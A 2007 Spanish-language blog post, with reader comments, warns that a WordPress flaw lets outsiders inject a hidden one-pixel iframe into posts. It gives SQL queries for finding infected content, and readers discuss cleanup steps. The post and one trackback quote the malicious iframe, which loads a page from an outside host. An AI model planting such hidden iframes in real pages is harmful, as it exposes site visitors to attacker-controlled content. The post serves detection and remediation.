aNieto2K Desarrollo web, Wordpress, y alguna cosilla más

Andrés Nieto

Palma de Mallorca, España

Menú

Buscador

Nuevo fallo en WordPress, insercción de iframe

6 Nov

aNieto2k hace 5866 días en: webdev, Wordpress

+ 22

Eduardo de De Mas Blog, me avisa de que han reportado un nuevo bug de WordPress, que aún están por corregir, pero que si conocemos podemos estar atentos para controlarlo.

Al parecer el bug, permite aprovecharse de algún exploit que permite insertar en WordPress un iframe con la siguiente estructura.

<!-- Traffic Statistics -->
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

El problema es que este contenido, aparece dentro del contenido del post, LO HA INTRODUCIDO ALGUIEN AJENO AL BLOG MEDIANTE UN EXPLOIT. Por lo que evidentemente pueden insertar contenido malicioso dentro de nuestros posts, algo realmente delicado.

Por desgracia, esto afecta a varias versiones de WordPress, incluida la 2.3.1.

Comprobar si ya hemos sido atacados

Para comprobar si ya hemos sido atacados, usaremos phpmyadmin (o similar) para buscar en el contenido de nuestros posts y comentarios (por si acaso) algún indicio de <iframe />

//Comentarios
SELECT *  FROM `PREFIX_comments` WHERE `comment_content` LIKE  '%<iframe%;

//Posts
SELECT *  FROM `PREFIX_posts` WHERE `post_title` LIKE  '%<iframe%';

PREFIX, es el prefijo que pusimos al instalar WordPress.

16 comentarios, 6 referencias

Bug peligroso en WordPress - Alejandro Torres 06/11/2007 09:11
Nuevo fallo en Wordpress | Xtreme News 07/11/2007 01:11
SigT 07/11/2007 02:11
power.org.mx » Blog Archive » Un Fallo más sobre Wordpress y Joomla 08/11/2007 06:11
<!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics ̵ 27/11/2007 03:11
Inyección de iframe en Wordpress | Entre Códigos 15/07/2008 03:07

maty
@2 noviembre 6th, 2007 at 1:19 pm

He mirado y nada. Por si acaso, copia de seguridad actualizada de todos los ficheros a mis discos duros.

Pues eso, no estaría de más que todos hiciesen lo mismo por aquello de que más vale prevenir…

Responder
So Whatz
@3 noviembre 6th, 2007 at 5:10 pm

Holas,
Me había dado cuenta de esto hace un par de días incluso lo utilice en uno de mis posts en mi blog, pero no veo como un bug permitir incluir iframes en el post. Contrario sería que se pudiera hacer en los comentarios.

En vez de bug yo lo llamaría funcionalidad, en el caso de tener varios autores en tu blog se debería poder restringir el acceso a esas funcionalidades (no se si existe eso ya).

Saludos!

Responder
aNieto2k
@4 noviembre 6th, 2007 at 5:32 pm

Creo que no me explicado bien, me refiero a que otras personas pueden insertar iframes en nuestro contenido.

Personas sin registrar y ajenas al blog.

Responder
So Whatz
@5 noviembre 6th, 2007 at 10:16 pm

Ahora me doy cuenta de lo que estás hablando… Yo creo que es más que peligroso el asunto del iframe por el sentido de que se pueden insertar otros codigos al post…

Buen dato

Responder
David Carrero Fdez-Baillo
@6 noviembre 7th, 2007 at 8:17 am

Usar Mod_security sobre apache es una buena solución de seguridad.

Responder
CalinSoft
@7 noviembre 8th, 2007 at 8:03 pm

Tendriamos que ver a quienes afecta ese bug… a los que cambiaron el prefijo wp_ por otro o a todos =)… seria buen dato

Responder
Power
@8 noviembre 8th, 2007 at 8:28 pm

ops.. !!! 😡 confundi a Andres con Arturo de Artux dot com dot ar Sorry Andresito por el resbalon, seguimos al pendiente de esta noticia 🙂

Responder
WaLhEZ
@9 noviembre 8th, 2007 at 10:27 pm

Ojala que pronto se encuentre una solucion a este bug, por que estan comprometidos nuestros post.

Responder
hely rojas
@10 noviembre 27th, 2007 at 10:33 pm

agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas

Responder
Jose Maria
@11 diciembre 18th, 2007 at 10:31 pm

Buenas noches a todos.
Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de WordPress.
Es decir, es un exploit que se aprovecha de los permisos de escritura del WordPress.
Lo hemos solucionado de la siguiente forma:
1- Eliminando las entradas al «iframe» de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el «index.html» del dominio principal)
2- Proteger con contraseña el directorio «wp-admin»
3- Asegurar permisos «chmod». En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.

Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio «wp-admin» y eliminamos los permisos de escritura en plugins (*.php y *css)

Un saludo a todos.

Responder
Rub
@12 abril 18th, 2008 at 8:11 am

Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P

Responder
Ruben
@13 julio 15th, 2008 at 3:38 pm

Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com.

¿Alguien tiene mas información sobre lo sucedido?

http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html

Responder
Claudia
@14 agosto 1st, 2008 at 3:17 am

igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT * FROM `PREFIX_posts` WHERE `post_title` LIKE ‘%<iframe%’;

y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión?

Responder
cucoalmeria
@15 enero 17th, 2009 at 9:30 pm

Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo
han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin
sploit scaner y me detecta varios iframes o script maliciosos y me
indica en que carpeta estan. Accedo por ftp a dichas carpetas o
archivos, los edito los limpio y los vuelvo a subir hasta que queda
todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en
los archivos index.

He quitado toda publicidad, el cambiado el theme y aún asi vuelve a
salir los dichosos codigos maliciosos por lo que google no me da el
visto bueno y dice que mi blog es un peligro.

He accedido a mi base de datos, en este tema estoy mas pegado. En el
buscador de la base de datos he intentado localizar los iframes pero
no los encuentra, no se si lo hago bien.

Lo curioso tambien es que se veo el codigo fuente de mis paginas, en
todas ellas salel dicho iframe al final de ellas.

Alguien tiene alguna solución, necesito ayuda por favor ?

gracias

Responder
cucoalmeria
@16 enero 17th, 2009 at 9:30 pm

Por cierto utilizao wp 2.7 ultima versión.

Responder
paul
@17 agosto 11th, 2009 at 8:57 pm

hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress

el codigo es un buscador de innmuebles
este es el codigo

y lo que me muestra al publicar la pagina es este codigo

src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0″ name=”I1″>

y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente

http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0

como logro hacerlo de la manera correcta

gracias de antemano

Responder